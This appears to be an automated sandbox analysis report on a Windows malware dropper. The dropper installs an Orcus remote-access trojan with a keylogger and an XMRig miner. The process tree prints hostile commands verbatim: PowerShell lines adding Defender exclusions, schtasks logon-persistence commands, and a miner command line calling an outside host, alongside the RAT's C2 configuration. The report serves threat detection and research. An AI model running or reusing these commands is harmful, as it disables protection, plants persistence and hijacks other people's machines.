Analysis
-
max time kernel
151s -
max time network
152s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
17-07-2021 08:03
Static task
static1
Behavioral task
behavioral1
Sample
a71f91351dc1bb57f0426080f2c03854.exe
Resource
win7v20210410
General
-
Target
a71f91351dc1bb57f0426080f2c03854.exe
-
Size
8.4MB
-
MD5
a71f91351dc1bb57f0426080f2c03854
-
SHA1
a336bd9298b0772f4d5764f695335fc7ef99755b
-
SHA256
f95e19a66cb1e3a612f2c07380376196e856dfefbe1038c4e6fd7d6a03388b5d
-
SHA512
dff5db2f6b3af11d10cb25c6e9df6df5bd4668ff54ba4ff1b6456ee7ab338e59297bad4d8722e7da15d175eabcd5833a632e5d62970d04993c733c379b7f4d19
Malware Config
Extracted
orcus
NewVPREFinal
67.242.2.35:10134
8185e643b7514e15b8dcfc7df7a8733b
-
autostart_method
TaskScheduler
-
enable_keylogger
true
-
install_path
%systemroot%\lsddsds\lsdds.exe
-
reconnect_delay
10000
-
registry_keyname
lsd
-
taskscheduler_taskname
lsdds
-
watchdog_path
Temp\olsdd.exe
Signatures
-
Orcus Main Payload 5 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe family_orcus C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe family_orcus C:\Windows\lsddsds\lsdds.exe family_orcus C:\Windows\lsddsds\lsdds.exe family_orcus C:\Windows\lsddsds\lsdds.exe family_orcus -
Looks for VirtualBox Guest Additions in registry 2 TTPs
-
Orcurs Rat Executable 5 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe orcus C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe orcus C:\Windows\lsddsds\lsdds.exe orcus C:\Windows\lsddsds\lsdds.exe orcus C:\Windows\lsddsds\lsdds.exe orcus -
XMRig Miner Payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4916-946-0x00000001402EB66C-mapping.dmp xmrig -
Executes dropped EXE 19 IoCs
Processes:
python.exedcbl.exeex.exeec.exefrefef.exeVu.exepython.exeObus.exeWindowsInput.exeWindowsInput.exelsdds.exelsdds.exedefendernottray.exetrayfontdefender.exeolsdd.exeolsdd.exeasasasas.exesihost64.exesihost32.exepid process 2880 python.exe 2608 dcbl.exe 212 ex.exe 3180 ec.exe 1548 frefef.exe 904 Vu.exe 412 python.exe 1328 Obus.exe 2728 WindowsInput.exe 4760 WindowsInput.exe 4628 lsdds.exe 4476 lsdds.exe 3892 defendernottray.exe 5116 trayfontdefender.exe 4180 olsdd.exe 4764 olsdd.exe 4448 asasasas.exe 680 sihost64.exe 1328 sihost32.exe -
Looks for VMWare Tools registry key 2 TTPs
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
frefef.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion frefef.exe -
Loads dropped DLL 13 IoCs
Processes:
python.exepid process 412 python.exe 412 python.exe 412 python.exe 412 python.exe 412 python.exe 412 python.exe 412 python.exe 412 python.exe 412 python.exe 412 python.exe 412 python.exe 412 python.exe 412 python.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 2 IoCs
Processes:
Obus.exedescription ioc process File created C:\Windows\assembly\Desktop.ini Obus.exe File opened for modification C:\Windows\assembly\Desktop.ini Obus.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 10 ifconfig.me 11 ifconfig.me 14 ip-api.com -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
frefef.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum frefef.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 frefef.exe -
Drops file in System32 directory 12 IoCs
Processes:
ec.exedefendernottray.exetrayfontdefender.exeWindowsInput.exeObus.exeex.exedescription ioc process File created \??\c:\windows\system32\trayfontdefender.exe ec.exe File opened for modification \??\c:\windows\system32\trayfontdefender.exe ec.exe File created \??\c:\windows\system32\microsoft\libs\WR64.sys defendernottray.exe File created \??\c:\windows\system32\microsoft\telemetry\sihost32.log trayfontdefender.exe File created C:\Windows\SysWOW64\WindowsInput.InstallState WindowsInput.exe File created C:\Windows\SysWOW64\WindowsInput.exe.config Obus.exe File created \??\c:\windows\system32\defendernottray.exe ex.exe File opened for modification \??\c:\windows\system32\defendernottray.exe ex.exe File created \??\c:\windows\system32\microsoft\libs\sihost64.exe defendernottray.exe File created \??\c:\windows\system32\microsoft\telemetry\sihost32.exe trayfontdefender.exe File created \??\c:\windows\system32\microsoft\libs\sihost64.log defendernottray.exe File created C:\Windows\SysWOW64\WindowsInput.exe Obus.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
defendernottray.exedescription pid process target process PID 3892 set thread context of 4916 3892 defendernottray.exe explorer.exe -
Drops file in Windows directory 6 IoCs
Processes:
Obus.exedescription ioc process File created C:\Windows\assembly\Desktop.ini Obus.exe File opened for modification C:\Windows\assembly\Desktop.ini Obus.exe File created C:\Windows\lsddsds\lsdds.exe Obus.exe File opened for modification C:\Windows\lsddsds\lsdds.exe Obus.exe File created C:\Windows\lsddsds\lsdds.exe.config Obus.exe File opened for modification C:\Windows\assembly Obus.exe -
Detects Pyinstaller 3 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\python\python.exe pyinstaller C:\Users\Admin\AppData\Local\Temp\python\python.exe pyinstaller C:\Users\Admin\AppData\Local\Temp\python\python.exe pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 1 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
frefef.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S frefef.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
frefef.exeVu.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 frefef.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString frefef.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 Vu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Vu.exe -
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 4860 schtasks.exe 5056 schtasks.exe 668 schtasks.exe 3908 schtasks.exe 3176 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 4588 timeout.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
frefef.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Logical Unit Id 0 frefef.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosInformation frefef.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer frefef.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemProductName frefef.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exeVu.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeex.exeec.exepowershell.exepowershell.exeolsdd.exelsdds.exepid process 1020 powershell.exe 1020 powershell.exe 2712 powershell.exe 2712 powershell.exe 904 Vu.exe 904 Vu.exe 904 Vu.exe 904 Vu.exe 1020 powershell.exe 1020 powershell.exe 904 Vu.exe 904 Vu.exe 2712 powershell.exe 2712 powershell.exe 904 Vu.exe 904 Vu.exe 904 Vu.exe 904 Vu.exe 904 Vu.exe 904 Vu.exe 904 Vu.exe 904 Vu.exe 904 Vu.exe 904 Vu.exe 904 Vu.exe 904 Vu.exe 904 Vu.exe 904 Vu.exe 904 Vu.exe 904 Vu.exe 4812 powershell.exe 4812 powershell.exe 4848 powershell.exe 4848 powershell.exe 4812 powershell.exe 4848 powershell.exe 4848 powershell.exe 4296 powershell.exe 4296 powershell.exe 4380 powershell.exe 4296 powershell.exe 4380 powershell.exe 4380 powershell.exe 4920 powershell.exe 4920 powershell.exe 4920 powershell.exe 4640 powershell.exe 4640 powershell.exe 4640 powershell.exe 212 ex.exe 3180 ec.exe 4212 powershell.exe 2884 powershell.exe 4212 powershell.exe 2884 powershell.exe 4212 powershell.exe 4764 olsdd.exe 4764 olsdd.exe 4628 lsdds.exe 4628 lsdds.exe 4628 lsdds.exe 4764 olsdd.exe 2884 powershell.exe 4628 lsdds.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
lsdds.exepid process 4628 lsdds.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Vu.exepowershell.exefrefef.exepowershell.exeWMIC.exedescription pid process Token: SeDebugPrivilege 904 Vu.exe Token: SeDebugPrivilege 1020 powershell.exe Token: SeDebugPrivilege 1548 frefef.exe Token: SeDebugPrivilege 2712 powershell.exe Token: SeIncreaseQuotaPrivilege 4756 WMIC.exe Token: SeSecurityPrivilege 4756 WMIC.exe Token: SeTakeOwnershipPrivilege 4756 WMIC.exe Token: SeLoadDriverPrivilege 4756 WMIC.exe Token: SeSystemProfilePrivilege 4756 WMIC.exe Token: SeSystemtimePrivilege 4756 WMIC.exe Token: SeProfSingleProcessPrivilege 4756 WMIC.exe Token: SeIncBasePriorityPrivilege 4756 WMIC.exe Token: SeCreatePagefilePrivilege 4756 WMIC.exe Token: SeBackupPrivilege 4756 WMIC.exe Token: SeRestorePrivilege 4756 WMIC.exe Token: SeShutdownPrivilege 4756 WMIC.exe Token: SeDebugPrivilege 4756 WMIC.exe Token: SeSystemEnvironmentPrivilege 4756 WMIC.exe Token: SeRemoteShutdownPrivilege 4756 WMIC.exe Token: SeUndockPrivilege 4756 WMIC.exe Token: SeManageVolumePrivilege 4756 WMIC.exe Token: 33 4756 WMIC.exe Token: 34 4756 WMIC.exe Token: 35 4756 WMIC.exe Token: 36 4756 WMIC.exe Token: SeIncreaseQuotaPrivilege 4756 WMIC.exe Token: SeSecurityPrivilege 4756 WMIC.exe Token: SeTakeOwnershipPrivilege 4756 WMIC.exe Token: SeLoadDriverPrivilege 4756 WMIC.exe Token: SeSystemProfilePrivilege 4756 WMIC.exe Token: SeSystemtimePrivilege 4756 WMIC.exe Token: SeProfSingleProcessPrivilege 4756 WMIC.exe Token: SeIncBasePriorityPrivilege 4756 WMIC.exe Token: SeCreatePagefilePrivilege 4756 WMIC.exe Token: SeBackupPrivilege 4756 WMIC.exe Token: SeRestorePrivilege 4756 WMIC.exe Token: SeShutdownPrivilege 4756 WMIC.exe Token: SeDebugPrivilege 4756 WMIC.exe Token: SeSystemEnvironmentPrivilege 4756 WMIC.exe Token: SeRemoteShutdownPrivilege 4756 WMIC.exe Token: SeUndockPrivilege 4756 WMIC.exe Token: SeManageVolumePrivilege 4756 WMIC.exe Token: 33 4756 WMIC.exe Token: 34 4756 WMIC.exe Token: 35 4756 WMIC.exe Token: 36 4756 WMIC.exe Token: SeIncreaseQuotaPrivilege 2712 powershell.exe Token: SeSecurityPrivilege 2712 powershell.exe Token: SeTakeOwnershipPrivilege 2712 powershell.exe Token: SeLoadDriverPrivilege 2712 powershell.exe Token: SeSystemProfilePrivilege 2712 powershell.exe Token: SeSystemtimePrivilege 2712 powershell.exe Token: SeProfSingleProcessPrivilege 2712 powershell.exe Token: SeIncBasePriorityPrivilege 2712 powershell.exe Token: SeCreatePagefilePrivilege 2712 powershell.exe Token: SeBackupPrivilege 2712 powershell.exe Token: SeRestorePrivilege 2712 powershell.exe Token: SeShutdownPrivilege 2712 powershell.exe Token: SeDebugPrivilege 2712 powershell.exe Token: SeSystemEnvironmentPrivilege 2712 powershell.exe Token: SeRemoteShutdownPrivilege 2712 powershell.exe Token: SeUndockPrivilege 2712 powershell.exe Token: SeManageVolumePrivilege 2712 powershell.exe Token: 33 2712 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
lsdds.exepid process 4628 lsdds.exe -
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
lsdds.exepid process 4628 lsdds.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
lsdds.exepid process 4628 lsdds.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
a71f91351dc1bb57f0426080f2c03854.exepython.exeex.exeec.execmd.execmd.exepython.exeVu.execmd.execmd.execmd.exeObus.execsc.execmd.exedescription pid process target process PID 1096 wrote to memory of 2880 1096 a71f91351dc1bb57f0426080f2c03854.exe python.exe PID 1096 wrote to memory of 2880 1096 a71f91351dc1bb57f0426080f2c03854.exe python.exe PID 1096 wrote to memory of 2608 1096 a71f91351dc1bb57f0426080f2c03854.exe dcbl.exe PID 1096 wrote to memory of 2608 1096 a71f91351dc1bb57f0426080f2c03854.exe dcbl.exe PID 1096 wrote to memory of 2608 1096 a71f91351dc1bb57f0426080f2c03854.exe dcbl.exe PID 1096 wrote to memory of 212 1096 a71f91351dc1bb57f0426080f2c03854.exe ex.exe PID 1096 wrote to memory of 212 1096 a71f91351dc1bb57f0426080f2c03854.exe ex.exe PID 1096 wrote to memory of 3180 1096 a71f91351dc1bb57f0426080f2c03854.exe ec.exe PID 1096 wrote to memory of 3180 1096 a71f91351dc1bb57f0426080f2c03854.exe ec.exe PID 1096 wrote to memory of 1548 1096 a71f91351dc1bb57f0426080f2c03854.exe frefef.exe PID 1096 wrote to memory of 1548 1096 a71f91351dc1bb57f0426080f2c03854.exe frefef.exe PID 1096 wrote to memory of 904 1096 a71f91351dc1bb57f0426080f2c03854.exe Vu.exe PID 1096 wrote to memory of 904 1096 a71f91351dc1bb57f0426080f2c03854.exe Vu.exe PID 2880 wrote to memory of 412 2880 python.exe python.exe PID 2880 wrote to memory of 412 2880 python.exe python.exe PID 1096 wrote to memory of 1328 1096 a71f91351dc1bb57f0426080f2c03854.exe Obus.exe PID 1096 wrote to memory of 1328 1096 a71f91351dc1bb57f0426080f2c03854.exe Obus.exe PID 212 wrote to memory of 2056 212 ex.exe cmd.exe PID 212 wrote to memory of 2056 212 ex.exe cmd.exe PID 3180 wrote to memory of 2548 3180 ec.exe cmd.exe PID 3180 wrote to memory of 2548 3180 ec.exe cmd.exe PID 2548 wrote to memory of 1020 2548 cmd.exe powershell.exe PID 2548 wrote to memory of 1020 2548 cmd.exe powershell.exe PID 2056 wrote to memory of 2712 2056 cmd.exe powershell.exe PID 2056 wrote to memory of 2712 2056 cmd.exe powershell.exe PID 412 wrote to memory of 4484 412 python.exe cmd.exe PID 412 wrote to memory of 4484 412 python.exe cmd.exe PID 904 wrote to memory of 4588 904 Vu.exe cmd.exe PID 904 wrote to memory of 4588 904 Vu.exe cmd.exe PID 4484 wrote to memory of 4756 4484 cmd.exe WMIC.exe PID 4484 wrote to memory of 4756 4484 cmd.exe WMIC.exe PID 4588 wrote to memory of 4772 4588 cmd.exe chcp.com PID 4588 wrote to memory of 4772 4588 cmd.exe chcp.com PID 4588 wrote to memory of 4888 4588 cmd.exe netsh.exe PID 4588 wrote to memory of 4888 4588 cmd.exe netsh.exe PID 904 wrote to memory of 5084 904 Vu.exe cmd.exe PID 904 wrote to memory of 5084 904 Vu.exe cmd.exe PID 5084 wrote to memory of 2704 5084 cmd.exe chcp.com PID 5084 wrote to memory of 2704 5084 cmd.exe chcp.com PID 5084 wrote to memory of 2644 5084 cmd.exe netsh.exe PID 5084 wrote to memory of 2644 5084 cmd.exe netsh.exe PID 5084 wrote to memory of 4428 5084 cmd.exe findstr.exe PID 5084 wrote to memory of 4428 5084 cmd.exe findstr.exe PID 2548 wrote to memory of 4812 2548 cmd.exe powershell.exe PID 2548 wrote to memory of 4812 2548 cmd.exe powershell.exe PID 2056 wrote to memory of 4848 2056 cmd.exe powershell.exe PID 2056 wrote to memory of 4848 2056 cmd.exe powershell.exe PID 1328 wrote to memory of 4844 1328 Obus.exe csc.exe PID 1328 wrote to memory of 4844 1328 Obus.exe csc.exe PID 4844 wrote to memory of 5052 4844 csc.exe cvtres.exe PID 4844 wrote to memory of 5052 4844 csc.exe cvtres.exe PID 2548 wrote to memory of 4296 2548 cmd.exe powershell.exe PID 2548 wrote to memory of 4296 2548 cmd.exe powershell.exe PID 2056 wrote to memory of 4380 2056 cmd.exe powershell.exe PID 2056 wrote to memory of 4380 2056 cmd.exe powershell.exe PID 2548 wrote to memory of 4920 2548 cmd.exe powershell.exe PID 2548 wrote to memory of 4920 2548 cmd.exe powershell.exe PID 1328 wrote to memory of 2728 1328 Obus.exe WindowsInput.exe PID 1328 wrote to memory of 2728 1328 Obus.exe WindowsInput.exe PID 2056 wrote to memory of 4640 2056 cmd.exe powershell.exe PID 2056 wrote to memory of 4640 2056 cmd.exe powershell.exe PID 904 wrote to memory of 5080 904 Vu.exe cmd.exe PID 904 wrote to memory of 5080 904 Vu.exe cmd.exe PID 5080 wrote to memory of 4924 5080 cmd.exe chcp.com
Processes
-
C:\Users\Admin\AppData\Local\Temp\a71f91351dc1bb57f0426080f2c03854.exe"C:\Users\Admin\AppData\Local\Temp\a71f91351dc1bb57f0426080f2c03854.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\python\python.exe"C:\Users\Admin\AppData\Local\Temp\python\python.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\python\python.exe"C:\Users\Admin\AppData\Local\Temp\python\python.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\AudioOutM\dcbl.exe"C:\Users\Admin\AppData\Local\Temp\AudioOutM\dcbl.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "asasasas" /tr '"C:\Users\Admin\AppData\Local\Temp\asasasas.exe"' & exit3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "asasasas" /tr '"C:\Users\Admin\AppData\Local\Temp\asasasas.exe"'4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpCE13.tmp.bat""3⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\asasasas.exe"C:\Users\Admin\AppData\Local\Temp\asasasas.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\SecurityTrayManager\ex.exe"C:\Users\Admin\AppData\Local\Temp\SecurityTrayManager\ex.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'4⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'4⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'4⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "defendernottray" /tr '"c:\windows\system32\defendernottray.exe"' & exit3⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "defendernottray" /tr '"c:\windows\system32\defendernottray.exe"'4⤵
- Creates scheduled task(s)
-
C:\windows\system32\defendernottray.exe"C:\windows\system32\defendernottray.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
-
C:\windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'5⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "defendernottray" /tr '"c:\windows\system32\defendernottray.exe"' & exit4⤵
-
\??\c:\windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "defendernottray" /tr '"c:\windows\system32\defendernottray.exe"'5⤵
- Creates scheduled task(s)
-
C:\windows\system32\microsoft\libs\sihost64.exe"C:\windows\system32\microsoft\libs\sihost64.exe"4⤵
- Executes dropped EXE
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=67.242.2.35:3333 --user=CGFBFPSXA --pass= --cpu-max-threads-hint=70 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6CJ80EuZhDq7w3QiPw3/9PYjASC1sXGu0nCxs9jooG2T" --cinit-idle-wait=12 --cinit-idle-cpu=90 --nicehash --cinit-stealth4⤵
-
C:\Users\Admin\AppData\Local\Temp\WindowsDefenderHelper\ec.exe"C:\Users\Admin\AppData\Local\Temp\WindowsDefenderHelper\ec.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'4⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'4⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'4⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "trayfontdefender" /tr '"c:\windows\system32\trayfontdefender.exe"' & exit3⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "trayfontdefender" /tr '"c:\windows\system32\trayfontdefender.exe"'4⤵
- Creates scheduled task(s)
-
C:\windows\system32\trayfontdefender.exe"C:\windows\system32\trayfontdefender.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'5⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "trayfontdefender" /tr '"c:\windows\system32\trayfontdefender.exe"' & exit4⤵
-
\??\c:\windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "trayfontdefender" /tr '"c:\windows\system32\trayfontdefender.exe"'5⤵
- Creates scheduled task(s)
-
C:\windows\system32\microsoft\telemetry\sihost32.exe"C:\windows\system32\microsoft\telemetry\sihost32.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Omlious\frefef.exe"C:\Users\Admin\AppData\Local\Temp\Omlious\frefef.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe"C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe"2⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nkxkuiai.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES81E8.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC81D8.tmp"4⤵
-
C:\Windows\SysWOW64\WindowsInput.exe"C:\Windows\SysWOW64\WindowsInput.exe" --install3⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\lsddsds\lsdds.exe"C:\Windows\lsddsds\lsdds.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\olsdd.exe"C:\Users\Admin\AppData\Local\Temp\olsdd.exe" /launchSelfAndExit "C:\Windows\lsddsds\lsdds.exe" 4628 /protectFile4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\olsdd.exe"C:\Users\Admin\AppData\Local\Temp\olsdd.exe" /watchProcess "C:\Windows\lsddsds\lsdds.exe" 4628 "/protectFile"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\Vulturi\Vu.exe"C:\Users\Admin\AppData\Local\Temp\Vulturi\Vu.exe"2⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
